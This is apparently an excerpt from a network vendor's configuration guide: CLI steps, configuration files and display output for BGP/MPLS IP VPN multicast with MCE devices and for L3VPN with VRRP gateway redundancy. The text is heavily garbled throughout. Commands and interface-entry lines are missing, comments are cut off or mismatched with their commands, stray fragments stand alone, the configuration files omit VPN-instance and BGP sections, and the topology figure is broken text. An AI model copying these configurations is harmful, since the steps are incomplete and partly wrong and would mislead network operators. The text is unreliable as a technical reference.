3. Establish a Multiprotocol Interior Border Gateway Protocol (MP-IBGP) peer
relationship between the provider edge devices PE1 and PE2.
# Configure PE1.
[PE1] bgp 100
[PE1-bgp] peer 3.3.3.3 as-number 100 //Create BGP peer 3.3.3.3 and set
its AS number to 100.
[PE1-bgp] peer 3.3.3.3 connect-interface loopback 0 //Specify LoopBack0
as the source interface to send BGP packets to BGP peer 3.3.3.3.
[PE1-bgp] ipv4-family vpnv4 //Enter the BGP-VPNv4 address family view.
[PE1-bgp-af-vpnv4] peer 3.3.3.3 enable //Enable the local switch to
exchange BGP-VPNv4 routes with BGP peer 3.3.3.3.
[PE1-bgp] quit
# Configure PE2.
[PE2] bgp 100
[PE2-bgp] peer 1.1.1.1 as-number 100 //Create BGP peer 1.1.1.1 and set
its AS number to 100.
[PE2-bgp] peer 1.1.1.1 connect-interface loopback 0 //Specify LoopBack0
as the source interface to send BGP packets to 1.1.1.1.
[PE2-bgp] ipv4-family vpnv4 //Enter the BGP-VPNv4 address family view.
[PE2-bgp-af-vpnv4] peer 1.1.1.1 enable ///Enable the local switch to
exchange BGP-VPNv4 routes with BGP peer 1.1.1.1.
[PE2-bgp] quit
After the configuration is complete, run the display bgp vpnv4 all peer command on the
PE devices. You can see that a BGP peer relationship has been set up between PE1 and
PE2 and is in Established state.
4. Create VPN instances blue and white on the provider edge devices PE1 and PE2, and
aggregate egress devices MCE1 and MCE2 for branches, to connect each service site's
egress CE to the PE devices through the MCE devices.
# Configure PE1.
[PE1] ip vpn-instance blue //Create VPN instance blue.
[PE1-vpn-instance-blue] route-distinguisher 100:1 //Set the RD of VPN
instance blue to 100:1.
[PE1-vpn-instance-blue-af-ipv4] vpn-target 111:1 both //Add 111:1 to the
export VPN target list and import VPN target list of VPN instance blue.
[PE1-vpn-instance-blue-af-ipv4] quit
[PE1-vpn-instance-blue] quit
[PE1] ip vpn-instance white //Create VPN instance white.
[PE1-vpn-instance-white] route-distinguisher 200:1 //Set the RD of VPN
instance white to 200:1.
[PE1-vpn-instance-white-af-ipv4] vpn-target 222:1 both //Add 222:1 to the
export VPN target list and import VPN target list of VPN instance white.
[PE1-vpn-instance-white-af-ipv4] quit
[PE1-vpn-instance-white] quit
[PE1-Vlanif10] ip binding vpn-instance blue //Bind VPN instance blue to
VLANIF10 so that VLANIF10 becomes a private network interface of VPN instance
blue.

[PE1-Vlanif10] quit
[PE1-Vlanif20] ip binding vpn-instance white //Bind VPN instance blue to
white.
[PE1-Vlanif20] quit
# Configure MCE1.
[MCE1] ip vpn-instance blue //Create VPN instance blue.
[MCE1-vpn-instance-blue] route-distinguisher 100:1 //Set the RD of VPN
[MCE1-vpn-instance-blue-af-ipv4] vpn-target 111:1 both //Add 111:1 to the
[MCE1-vpn-instance-blue-af-ipv4] quit
[MCE1-vpn-instance-blue] quit
[MCE1] ip vpn-instance white //Create VPN instance white.
[MCE1-vpn-instance-white] route-distinguisher 200:1 //Set the RD of VPN
[MCE1-vpn-instance-white-af-ipv4] vpn-target 222:1 both //Add 222:1 to
the export VPN target list and import VPN target list of VPN instance white.
[MCE1-vpn-instance-white-af-ipv4] quit
[MCE1-vpn-instance-white] quit
[MCE1] vlan batch 10 20 100 200
[MCE1] interface gigabitethernet 1/0/0
[MCE1-GigabitEthernet1/0/0] port link-type trunk //Set the link type of
[MCE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10 20
[MCE1-GigabitEthernet1/0/0] quit
[MCE1-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[MCE1] interface vlanif 10
[MCE1-Vlanif10] ip binding vpn-instance blue //Bind VPN instance blue to
blue.
[MCE1-Vlanif10] ip address 10.1.1.2 24
[MCE1-Vlanif10] quit
[MCE1-Vlanif20] ip binding vpn-instance white //Bind VPN instance white
to VLANIF20 so that VLANIF20 becomes a private network interface of VPN
instance white.
VLANIF100 so that VLANIF100 becomes a private network interface of VPN
instance blue.
instance white.
# Configure PE2.
[PE2] ip vpn-instance blue //Create VPN instance blue.
[PE2-vpn-instance-blue] route-distinguisher 100:1 //Set the RD of VPN

[PE2-vpn-instance-blue-af-ipv4] vpn-target 111:1 both //Add 111:1 to the

[PE2] ip vpn-instance white //Create VPN instance white.
[PE2-vpn-instance-white] route-distinguisher 200:1 //Set the RD of VPN
[PE2-vpn-instance-white-af-ipv4] vpn-target 222:1 both //Add 222:1 to the
export VPN target list and import VPN target list of VPN instance white.
[PE2-Vlanif50] ip binding vpn-instance blue //Bind VPN instance blue to
blue.
[PE2-Vlanif50] quit
[PE2-Vlanif60] ip binding vpn-instance white //Bind VPN instance white to
white.
[PE2-Vlanif60] quit
# Configure MCE2.
[MCE2] ip vpn-instance blue //Create VPN instance blue.
[MCE2-vpn-instance-blue] route-distinguisher 100:1 //Set the RD of VPN
[MCE2-vpn-instance-blue-af-ipv4] vpn-target 111:1 both //Add 111:1 to the
[MCE2-vpn-instance-blue-af-ipv4] quit
[MCE2] ip vpn-instance white //Create VPN instance white.
[MCE2-vpn-instance-white] route-distinguisher 200:1 //Set the RD of VPN
[MCE2-vpn-instance-white-af-ipv4] vpn-target 222:1 both //Add 222:1 to
the export VPN target list and import VPN target list of VPN instance white.
[MCE2-vpn-instance-white-af-ipv4] quit
[MCE2] vlan batch 50 60 300 400
[MCE2-GigabitEthernet1/0/0] port trunk allow-pass vlan 50 60
blue.


instance white.
VLANIF300 so that VLANIF300 becomes a private network interface of VPN
instance blue.
instance white.
5. Configure OSPF on the provider edge devices PE1 and PE2, branches' aggregate egress
devices MCE1 and MCE2, and each service site's egress CE. Import VPN routes to the
OSPF routing table.
# Configure PE1.
[PE1] ospf 2 vpn-instance blue //Create an OSPF process to serve VPN
instance blue.
[PE1-ospf-2] import-route bgp //Import BGP routes.
[PE1-ospf-2] area 0
[PE1-ospf-2] quit
[PE1] ospf 3 vpn-instance white //Create an OSPF process to serve VPN
instance white.
[PE1-ospf-3] area 0
[PE1-ospf-3] quit
[PE1] bgp 100
[PE1-bgp] ipv4-family vpn-instance blue //Enter the IPv4 address family
view of BGP-VPN instance blue.
[PE1-bgp-blue] import-route ospf 2 //Import routes of OSPF process 2.
[PE1-bgp-blue] quit
[PE1-bgp] ipv4-family vpn-instance white //Enter the IPv4 address family
view of BGP-VPN instance white
[PE1-bgp-white] import-route ospf 3 //Import routes of OSPF process 3.
[PE1-bgp-white] quit
[PE1-bgp] quit
# Configure MCE1.
[MCE1] ospf 1 vpn-instance blue //Create an OSPF process to serve VPN
instance blue.
[MCE1-ospf-1] vpn-instance-capability simple //Disable OSPF routing loop
detection.
[MCE1-ospf-1] area 0
[MCE1-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255 //Specify that the
interface is running OSPF is the one connected to the 10.1.1.0 network
[MCE1-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255 //Specify that
the interface is running OSPF is the one connected to the 192.168.1.0 network
[MCE1-ospf-1-area-0.0.0.0] quit
[MCE1-ospf-1] quit
[MCE1] ospf 2 vpn-instance white //Create an OSPF process to serve VPN
instance white.


detection.
[MCE1-ospf-2] quit
# Configure PE2.
[PE2] ospf 2 vpn-instance blue //Create an OSPF process to serve VPN
instance blue.
[PE2-ospf-2] area 0
[PE2-ospf-2] quit
[PE2] ospf 3 vpn-instance white //Create an OSPF process to serve VPN
instance white.
[PE2-ospf-3] area 0
[PE2-ospf-3] quit
[PE2] bgp 100
[PE2-bgp] ipv4-family vpn-instance blue //Enter the IPv4 address family
view of BGP-VPN instance blue.
[PE2-bgp-blue] import-route ospf 2 //Import routes of OSPF process 2.
[PE2-bgp-blue] quit
[PE2-bgp] ipv4-family vpn-instance white //Enter the IPv4 address family
view of BGP-VPN instance white.
[PE2-bgp-white] import-route ospf 3 //Import routes of OSPF process 3.
[PE2-bgp-white] quit
[PE2-bgp] quit
# Configure MCE2.
[MCE2] ospf 1 vpn-instance blue //Create an OSPF process to serve VPN
instance blue.
detection.
[MCE2-ospf-1] quit
[MCE2] ospf 2 vpn-instance white //Create an OSPF process to serve VPN
instance white.
detection.
[MCE2-ospf-2] quit

# Configure CE1, egress for a site of service A.

[CE1] vlan batch 100 101
[CE1-GigabitEthernet1/0/1] port link-type trunk //Set the link type of
[CE1-Vlanif100] quit
[CE1] ospf
[CE1-ospf-1] area 0
[CE1-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255 //Specify that
the interface is running OSPF is the one connected to the 192.168.11.0
network segment and that the interface belongs to Area 0.
[CE1-ospf-1-area-0.0.0.0] quit
[CE1-ospf-1] quit
# Configure CE2, egress for a site of service B.

[CE2] ospf
[CE2-ospf-1] area 0
[CE2-ospf-1] quit



[CE3] ospf
[CE3-ospf-1] area 0
[CE3-ospf-1] quit

[CE4] ospf
[CE4-ospf-1] area 0
[CE4-ospf-1] quit
After the configuration is complete, run the display ip routing-table vpn-instance vpn-
instance-name command on the PE or MCE devices. You can see that the local PE or
MCE device has a VPN route to the remote PE. Run the display ip routing-table
protocol ospf command on the CE devices. You can see that CE1 and CE3 have learned
routes to each other, and CE2 and CE4 have learned routes to each other.
Step 2 Configure multicast loopback interfaces, share-group addresses, and MTIs for VPN instances
on the provider edge devices PE1 and PE2.
# Configure PE1.
[PE1] interface eth-trunk 10
[PE1-Eth-Trunk10] service type multicast-tunnel //Configure Eth-Trunk 10 as a
multicast loopback interface.
[PE1-Eth-Trunk10] trunkport gigabitethernet 3/0/5 //Bind member interface
GE3/0/5 to Eth-Trunk 10.
[PE1] ip vpn-instance blue

[PE1-vpn-instance-blue] multicast routing-enable //Enable multicast routing

in VPN instance blue.
[PE1-vpn-instance-blue] multicast-domain share-group 239.1.1.1 binding mtunnel
0 //Specify 239.1.1.1 as the Share-Group for VPN instance blue and bind it to
multicast tunnel interface MTI0.
[PE1-vpn-instance-blue] ipv4-family
[PE1-vpn-instance-blue-af-ipv4] multicast-domain source-interface loopback
0 //Configure the MTI to use the address of Loopback0 as the default address.
[PE1] ip vpn-instance white
[PE1-vpn-instance-white] multicast routing-enable //Enable multicast routing
in VPN instance white.
[PE1-vpn-instance-white] multicast-domain share-group 239.1.2.1 binding mtunnel
10 //Specify 239.1.2.1 as the Share-Group for VPN instance white and bind it
to multicast tunnel interface MTI0.
[PE1-vpn-instance-white] ipv4-family
[PE1-vpn-instance-white-af-ipv4] multicast-domain source-interface loopback
# Configure PE2.
[PE2] interface eth-trunk 10
[PE2-Eth-Trunk10] service type multicast-tunnel //Configure Eth-Trunk 10 as a
multicast loopback interface.
[PE2-Eth-Trunk10] trunkport gigabitethernet 3/0/5 //Bind member interface
GE3/0/5 to Eth-Trunk 10.
[PE2] ip vpn-instance blue
[PE2-vpn-instance-blue] multicast routing-enable //Enable multicast routing
in VPN instance blue.
[PE2-vpn-instance-blue] multicast-domain share-group 239.1.1.1 binding mtunnel
0 //Specify 239.1.1.1 as the Share-Group for VPN instance blue and bind it to
multicast tunnel interface MTI0.
[PE2-vpn-instance-blue] ipv4-family
[PE2-vpn-instance-blue-af-ipv4] multicast-domain source-interface loopback
[PE2] ip vpn-instance white
[PE2-vpn-instance-white] multicast routing-enable //Enable multicast routing
in VPN instance white.
[PE2-vpn-instance-white] multicast-domain share-group 239.1.2.1 binding mtunnel
10 //Specify 239.1.2.1 as the Share-Group for VPN instance white and bind it
to multicast tunnel interface MTI0.
[PE2-vpn-instance-white] ipv4-family
[PE2-vpn-instance-white-af-ipv4] multicast-domain source-interface loopback
Step 3 Configure the multicast function on the public and private networks.
1. Configure the multicast function on the public network.
Enable PIM-SM on the public network. Configure Loopback0 of the provider's
intermediate device P as a candidate bootstrap router (C-BSR) and candidate rendezvous
point (C-RP) on the public network.
# Configure PE1.
[PE1] multicast routing-enable //Enable multicast routing globally.
[PE1-Vlanif30] pim sm //Enable PIM-SM on VLANIF30.
[PE1-Vlanif30] quit
[PE1-LoopBack0] pim sm //Enable PIM-SM on Loopback0.

# Configure PE2.
[PE2] multicast routing-enable //Enable multicast routing globally.
[PE2-Vlanif40] quit
[PE2-LoopBack0] pim sm //Enable PIM-SM on Loopback0.
# Configure P.
[P] multicast routing-enable //Enable multicast routing globally.
[P-Vlanif30] pim sm //Enable PIM-SM on VLANIF30.
[P-Vlanif30] quit
[P-Vlanif40] pim sm //Enable PIM-SM on VLANIF40.
[P-Vlanif40] quit
[P-LoopBack0] pim sm //Enable PIM-SM on Loopback0.
[P-LoopBack0] quit
[P] pim
[P-pim] c-bsr loopback 0 //Configure Loopback0 as a C-BSR interface.
[P-pim] c-rp loopback 0 //Configure Loopback0 as a C-RP interface.
2. Configure the multicast function on the private network.

Enable PIM-SM on the private networks. Configure VLANIF 10 of provider edge PE1
as a C-BSR and C-RP of VPN instance blue, and configure VLANIF 20 of PE1 as a C-
BSR and C-RP of VPN instance white. Configure IGMP on VLANIF 301 of service site
egress CE3 and VLANIF 401 of service site egress CE4. (The two VLANIF interfaces
are connected to network segments of receivers.)
# Configure PE1.
[PE1-Vlanif10] quit
[PE1-Vlanif20] quit
[PE1] pim vpn-instance blue
[PE1-vpn-instance-blue] c-bsr vlanif 10 //Configure VLANIF10 as a C-BSR
interface for VPN instance blue.
[PE1-vpn-instance-blue] c-rp vlanif 10 //Configure VLANIF10 as a C-RP
interface for VPN instance blue.
[PE1] pim vpn-instance white
[PE1-vpn-instance-white] c-bsr vlanif 20 //Configure VLANIF20 as a C-BSR
interface for VPN instance white.
[PE1-vpn-instance-white] c-rp vlanif 20 //Configure VLANIF20 as a C-RP
interface for VPN instance white.
# Configure MCE1.
[MCE1] multicast routing-enable //Enable multicast routing globally.
[MCE1] ip vpn-instance blue
[MCE1-vpn-instance-blue] multicast routing-enable //Enable multicast
routing in VPN instance blue.
[MCE1] ip vpn-instance white
[MCE1-vpn-instance-white] multicast routing-enable //Enable multicast
routing in VPN instance white.
[MCE1-Vlanif10] pim sm //Enable PIM-SM on VLANIF10.


# Configure PE2.
[PE2-Vlanif50] quit
[PE2-Vlanif60] quit
# Configure MCE2.
[MCE2] multicast routing-enable //Enable multicast routing globally.
[MCE2] ip vpn-instance blue
[MCE2-vpn-instance-blue] multicast routing-enable //Enable multicast
routing in VPN instance blue.
[MCE2] ip vpn-instance white
[MCE2-vpn-instance-white] multicast routing-enable //Enable multicast
routing in VPN instance white.
[MCE2] interface vlanif 50 //Enable PIM-SM on VLANIF50.
[MCE2-Vlanif50] pim sm

[CE1] multicast routing-enable //Enable multicast routing globally.
[CE1-Vlanif100] pim sm //Enable PIM-SM on VLANIF100.




[CE3-Vlanif301] igmp enable //Enable PIM-SM on VLANIF301.

[CE4-Vlanif401] igmp enable //Enable IGMP VLANIF401.

After the configuration is complete, receivers on the private networks can receive multicast
data from the multicast source.
----End
Configuration Files
l Configuration file of provider edge PE1
#
sysname PE1
#
router id 1.1.1.1
#
vlan batch 10 20 30
#
#
ip vpn-instance blue
ipv4-family
multicast-domain source-interface LoopBack0
multicast-domain share-group 239.1.1.1 binding mtunnel 0
#
ip vpn-instance white
ipv4-family
#
mpls lsr-id 1.1.1.1
mpls
#
mpls ldp
#
interface Vlanif10
ip binding vpn-instance blue
ip address 10.1.1.1 255.255.255.0
pim sm
#
interface Vlanif20
ip binding vpn-instance white
ip address 10.1.2.1 255.255.255.0
pim sm
#
interface Vlanif30

ip address 10.1.3.1 255.255.255.0

pim sm
mpls
mpls ldp
#
service type multicast-tunnel
#
#
#
eth-trunk 10
#
interface LoopBack0
ip address 1.1.1.1 255.255.255.255
pim sm
#
interface MTunnel0
#
interface MTunnel10
#
bgp 100
#
ipv4-family unicast
peer 3.3.3.3 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.3 enable
#
ipv4-family vpn-instance blue
import-route ospf 2
#
ipv4-family vpn-instance white
import-route ospf 3
#
ospf 1
area 0.0.0.0
network 1.1.1.1 0.0.0.0
network 10.1.3.0 0.0.0.255
#
ospf 2 vpn-instance blue
import-route bgp
area 0.0.0.0
network 10.1.1.0 0.0.0.255
#
ospf 3 vpn-instance white
import-route bgp
area 0.0.0.0
network 10.1.2.0 0.0.0.255
#
pim vpn-instance blue
c-bsr Vlanif10
c-rp Vlanif10
#
pim vpn-instance white
c-bsr Vlanif20
c-rp Vlanif20

#
return
l Configuration file of provider edge PE2
#
sysname PE2
#
router id 3.3.3.3
#
vlan batch 40 50 60
#
#
ipv4-family
#
ipv4-family
#
mpls lsr-id 3.3.3.3
mpls
#
mpls ldp
#
interface Vlanif40
ip address 10.1.4.2 255.255.255.0
pim sm
mpls
mpls ldp
#
interface Vlanif50
ip address 10.1.5.1 255.255.255.0
pim sm
#
interface Vlanif60
ip address 10.1.6.1 255.255.255.0
pim sm
#
service type multicast-tunnel
#
#
#
eth-trunk 10
#
interface LoopBack0
ip address 3.3.3.3 255.255.255.255
pim sm
#

interface MTunnel0
#
interface MTunnel10
#
bgp 100
#
ipv4-family unicast
peer 1.1.1.1 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.1 enable
#
ipv4-family vpn-instance blue
import-route ospf 2
#
ipv4-family vpn-instance white
import-route ospf 3
#
ospf 1
area 0.0.0.0
network 3.3.3.3 0.0.0.0
network 10.1.4.0 0.0.0.255
#
import-route bgp
area 0.0.0.0
network 10.1.5.0 0.0.0.255
#
import-route bgp
area 0.0.0.0
network 10.1.6.0 0.0.0.255
#
return
l Configuration file of provider intermediate device P
#
sysname P
#
router id 2.2.2.2
#
vlan batch 30 40
#
#
mpls lsr-id 2.2.2.2
mpls
#
mpls ldp
#
interface Vlanif30
ip address 10.1.3.2 255.255.255.0
pim sm
mpls
mpls ldp
#
interface Vlanif40
ip address 10.1.4.1 255.255.255.0
pim sm
mpls
mpls ldp
#


#
#
interface LoopBack0
ip address 2.2.2.2 255.255.255.255
pim sm
#
ospf 1
area 0.0.0.0
network 2.2.2.2 0.0.0.0
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
#
pim
c-bsr LoopBack0
c-rp LoopBack0
#
return
l Configuration file of branches' aggregate egress MCE1
#
sysname MCE1
#
vlan batch 10 20 100 200
#
#
ipv4-family
#
ipv4-family
#
interface Vlanif10
ip address 10.1.1.2 255.255.255.0
pim sm
#
interface Vlanif20
ip address 10.1.2.2 255.255.255.0
pim sm
#
interface Vlanif100
ip address 192.168.1.1 255.255.255.0
pim sm
#
interface Vlanif200
ip address 192.168.2.1 255.255.255.0
pim sm
#
#


#
#
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return
l Configuration file of branches' aggregate egress MCE2
#
sysname MCE2
#
vlan batch 50 60 300 400
#
#
ipv4-family
#
ipv4-family
#
interface Vlanif50
ip address 10.1.5.2 255.255.255.0
pim sm
#
interface Vlanif60
ip address 10.1.6.2 255.255.255.0
pim sm
#
interface Vlanif300
ip address 192.168.3.1 255.255.255.0
pim sm
#
interface Vlanif400
ip address 192.168.4.1 255.255.255.0
pim sm
#
#
#

#
area 0.0.0.0
network 10.1.5.0 0.0.0.255
network 192.168.3.0 0.0.0.255
#
area 0.0.0.0
network 10.1.6.0 0.0.0.255
network 192.168.4.0 0.0.0.255
#
return
l Configuration file of CE1, egress for a site of service A
#
sysname CE1
#
#
#
interface Vlanif100
ip address 192.168.1.2 255.255.255.0
pim sm
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
pim sm
#
#
#
ospf 1
area 0.0.0.0
network 192.168.1.0 0.0.0.255
network 192.168.11.0 0.0.0.255
#
return
l Configuration file of CE2, egress for a site of service B
#
sysname CE2
#
#
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
pim sm
#
interface Vlanif201
ip address 192.168.12.1 255.255.255.0
pim sm
#
#


#
ospf 1
area 0.0.0.0
network 192.168.2.0 0.0.0.255
network 192.168.12.0 0.0.0.255
#
return
l Configuration file of CE3, egress for a site of service A.

#
sysname CE3
#
#
#
interface Vlanif300
ip address 192.168.3.2 255.255.255.0
pim sm
#
interface Vlanif301
ip address 192.168.13.1 255.255.255.0
pim sm
#
#
#
ospf 1
area 0.0.0.0
network 192.168.3.0 0.0.0.255
network 192.168.13.0 0.0.0.255
#
return
l Configuration file of CE4, egress for a site of service B

#
sysname CE4
#
#
#
interface Vlanif400
ip address 192.168.4.2 255.255.255.0
pim sm
#
interface Vlanif401
ip address 192.168.14.1 255.255.255.0
pim sm
#
#
#
ospf 1
area 0.0.0.0
network 192.168.4.0 0.0.0.255
network 192.168.14.0 0.0.0.255

#
return
14.1.4 Example for Configuring L3VPN and VRRP
L3VPN and VRRP Overview

L3VPN is suitable for communication between the headquarters and branches in different
locations. As communication data needs to traverse the backbone network of the ISP, BGP is
used to advertise VPN routes and MPLS is used to forward VPN packets on the backbone
network. As different departments of an enterprise need to be isolated, BGP/MPLS IP VPN
can implement route isolation, address space isolation, and access isolation between different
VPNs.
Configuring multiple egress gateways is a common method to improve system reliability.
However, route selection between the gateways becomes an issue.
address to implement gateway backup. When the master in the virtual router fails, VRRP uses
a backup to transmit service traffic.
It is recommended that you set the preemption delay of the backup in a VRRP group to 0,
configure the master in preemption mode, and set the preemption delay to be longer than 15s.
These settings allow a period of time for status synchronization between the uplink and
downlink on an unstable network. If the preceding settings are not used, two masters may
coexist and user devices may learn incorrect address of the master. As a result, traffic is
interrupted.
l Preemption mode: A backup preempts to be the master when its priority is higher than
the master.
l Non-preemption mode: As long as the master is working properly, the backup with a
higher priority cannot become the master.
Configuration Notes
NOTE
As shown in Figure 14-4, CE1 and CE2 belongs to vpna, and CE1 is dual-homed to PE1 and
PE2 through the switch. The requirements are as follows:
l Normally, CE1 uses PE1 as the default gateway to communicate with CE2. When PE1
becomes faulty, PE2 takes over PE1, implementing gateway redundancy.

l After PE1 recovers, it preempts to be the master to transmit data after a preemption delay
of 20s.
NOTE
Figure 14-4 Networking for configuring L3VPN and VRRP

V R R P V R ID 1 L o o p b a ck1
V irtu a l IP A d d re s s : PE1
1 .1 .1 .1 /3 2
1 0 .1 .1 .1 1 1 M a s te r
G E 1 /0 /2
G E 1 /0 /1
G E 1 /0 /5
G E 1 /0 /3
G E 1 /0 /1 G E 1 /0 /1
L o o p b a ck1 G E 1 /0 /3
CE1 S w itc h CE2
3 .3 .3 .3 /3 2 G E 1 /0 /3
G E 1 /0 /2 PE3 G E 1 /0 /2
AS: 65410 AS: 65430
G E 1 /0 /5
vpna vpna
G E 1 /0 /1
G E 1 /0 /2
L o o p b a ck1 P E 2
2 .2 .2 .2 /3 2 B a c k u p
Device Interface VLANIF Interface IP Address
PE1 GE1/0/1 VLANIF 300 192.168.1.1/24
GE1/0/2 VLANIF 100 10.1.1.1/24
GE1/0/5 VLANIF 100 10.1.1.1/24
PE2 GE1/0/1 VLANIF 200 192.168.2.1/24
GE1/0/2 VLANIF 100 10.1.1.2/24
GE1/0/5 VLANIF 100 10.1.1.2/24
PE3 GE1/0/1 VLANIF 300 192.168.1.2/24
GE1/0/2 VLANIF 200 192.168.2.2/24
GE1/0/3 VLANIF 400 172.16.1.100/24
CE1 GE1/0/3 VLANIF 100 10.1.1.100/24
CE2 GE1/0/3 VLANIF 400 172.16.1.200/24
VRRP is configured to implement gateway redundancy on the L3VPN. The configuration
roadmap is as follows:
1. Configure OSPF between PEs to implement IP connectivity on the backbone network.

2. Configure basic MPLS functions and MPLS LDP on PEs so that MPLS LSPs can be
established to transmit VPN data.
3. Configure VPN instances on PEs to implement connectivity between VPNs. Bind VPN
instances to PE interfaces connected to CEs so that VPN users can be connected.
4. Configure MP-IBGP between PE1 and PE3, and between PE2 and PE3 to exchange
VPN routing information.
5. Configure EBGP between CEs and PEs to exchange VPN routing information.
6. Configure a loop prevention protocol on PE1, PE1, and switch to prevent loops. Here,
MSTP is used.
7. Configure a VRRP group on PE1 and PE2. Set a higher priority for PE1 so that PE1
functions as the master to forward traffic, and set the preemption delay to 20s on PE1.
Set a lower priority for PE2 so that PE2 functions as the backup.
Procedure
Step 1 Configure an IGP protocol on the MPLS backbone network so that the PEs can communicate
with each other.
# Configure PE1.
[PE1] vlan 300
[PE1-vlan300] quit
[PE1-GigabitEthernet1/0/1] port hybrid pvid vlan 300
[PE1-GigabitEthernet1/0/1] port hybrid untagged vlan 300
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1] quit
# Configure PE2.
[PE2] vlan 200
[PE2-vlan200] quit
[PE2] ospf 1
[PE2-ospf-1] area 0


[PE2-ospf-1] quit
# Configure PE3.
[PE3] ospf 1
[PE3-ospf-1] area 0
[PE3-ospf-1] quit
Step 2 Configure basic MPLS functions, enable MPLS LDP, and establish LDP LSPs on the MPLS
backbone network.
# Configure PE1.
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1-Vlanif300] mpls
# Configure PE2.
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
# Configure PE3.
[PE3] mpls
[PE3-mpls] quit
[PE3] mpls ldp
[PE3-mpls-ldp] quit


Step 3 Configure a VPN instance on each PE and connect CEs to PEs.

# Configure the switch.
[Switch] vlan 100
# Configure PE1.
[PE1] vlan 100
[PE1-vlan100] quit
# Configure PE2.
[PE2] vlan 100
[PE2-vlan100] quit

# Configure PE3.
[PE3] vlan 400
[PE3-vlan400] quit
# Configure CE1.
[CE1] vlan 100
[CE1-vlan100] quit
[CE1-GigabitEthernet1/0/3] port link-type hybrid
[CE1-GigabitEthernet1/0/3] port hybrid pvid vlan 100
[CE1-GigabitEthernet1/0/3] port hybrid untagged vlan 100
# Configure CE2.
[CE2] vlan 400
[CE2-vlan400] quit
[CE2-GigabitEthernet1/0/3] port hybrid pvid vlan 400
[CE2-GigabitEthernet1/0/3] port hybrid untagged vlan 400
Step 4 Set up EBGP peer relationships between PEs and CEs and import VPN routes.
# Configure CE1.
[CE1] bgp 65410
[CE1-bgp] quit
# Configure CE2.

[CE2] bgp 65430

[CE2-bgp] quit
# Configure PE1.
[PE1] bgp 100
[PE1-bgp-vpna] quit
[PE1-bgp] quit
# Configure PE2.
[PE2] bgp 100
[PE2-bgp-vpna] quit
[PE2-bgp] quit
# Configure PE3.
[PE3] bgp 100
[PE3-bgp-vpna] quit
[PE3-bgp] quit
Step 5 Set up MP-IBGP peer relationships between PEs.

# Configure PE1.
[PE1] bgp 100
[PE1-bgp] quit
# Configure PE2.
[PE2] bgp 100
[PE2-bgp] quit
# Configure PE3.
[PE3] bgp 100
[PE3-bgp] quit
Step 6 Configure MSTP to block the link between PE2 and the switch and prevent loops.
# Configure PE1 to work in MSTP mode.

[PE1] stp mode mstp
# Configure PE2 to work in MSTP mode.

[PE2] stp mode mstp
# Configure the switch to work in MSTP mode.

[Switch] stp mode mstp
# Configure PE1 as the root bridge.

[PE1] stp root primary
# Configure PE2 as the secondary root bridge.

[PE2] stp root secondary
# Set the path cost of the port connecting PE2 and the switch to 400000 to block the link
between PE2 and the switch.
[PE2-GigabitEthernet1/0/2] stp cost 400000
[Switch-GigabitEthernet1/0/2] stp cost 400000
# Disable STP on GigabitEthernet1/0/3 connecting SwitchA and CE1.

[Switch-GigabitEthernet1/0/3] stp disable
# Enable STP on PE1 globally.

[PE1] stp enable
# Enable STP on PE2 globally.

[PE2] stp enable
# Enable STP on the switch globally.

[Switch] stp enable
# After the configuration is complete, run the display stp brief command on the switch. You
can see that GE1/0/2 is the alternate port and in DISCARDING state.
[Switch] display stp brief
# Configure VRRP group 1 on PE1, and set the priority of PE1 to 120 and the preemption
delay to 20s.
[PE1-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.111 //Create VRRP group 1.
[PE1-Vlanif100] vrrp vrid 1 priority 120 //Set the priority to 120.
[PE1-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //Set the preemption
delay to 20s.
# Configure VRRP group 1 on PE2. PE2 uses default value 100.


[PE2-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.111 //Create VRRP group 1.

# After the configuration is complete, run the display vrrp command on PE1 and PE2. You
can see that PE1 is in Master state and PE2 is in Backup state.
[PE1] display vrrp
State : Master
Virtual IP : 10.1.1.111
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
[PE2] display vrrp
State : Backup
Virtual IP : 10.1.1.111
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
# Run the shutdown command on GE1/0/2 and GE1/0/5 of PE1 to simulate a link fault.
[PE1-GigabitEthernet1/0/2] shutdown
[PE1-GigabitEthernet1/0/5] shutdown
# Run the display vrrp command on PE2 to check the VRRP status. The command output
shows that PE2 is in Master state.
[PE2] display vrrp
State : Master
Virtual IP : 10.1.1.111
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s

Auth type : NONE

Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:18:40
# Run the undo shutdown command on GE1/0/2 and GE1/0/5 of PE1. After 20s, run the
display vrrp command on PE1 to check the VRRP status. PE1 restores to be in Master state.
[PE1-GigabitEthernet1/0/2] undo shutdown
[PE1-GigabitEthernet1/0/5] undo shutdown
[PE1] display vrrp
State : Master
Virtual IP : 10.1.1.111
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:20:56
----End
Configuration Files
#
sysname PE1
#
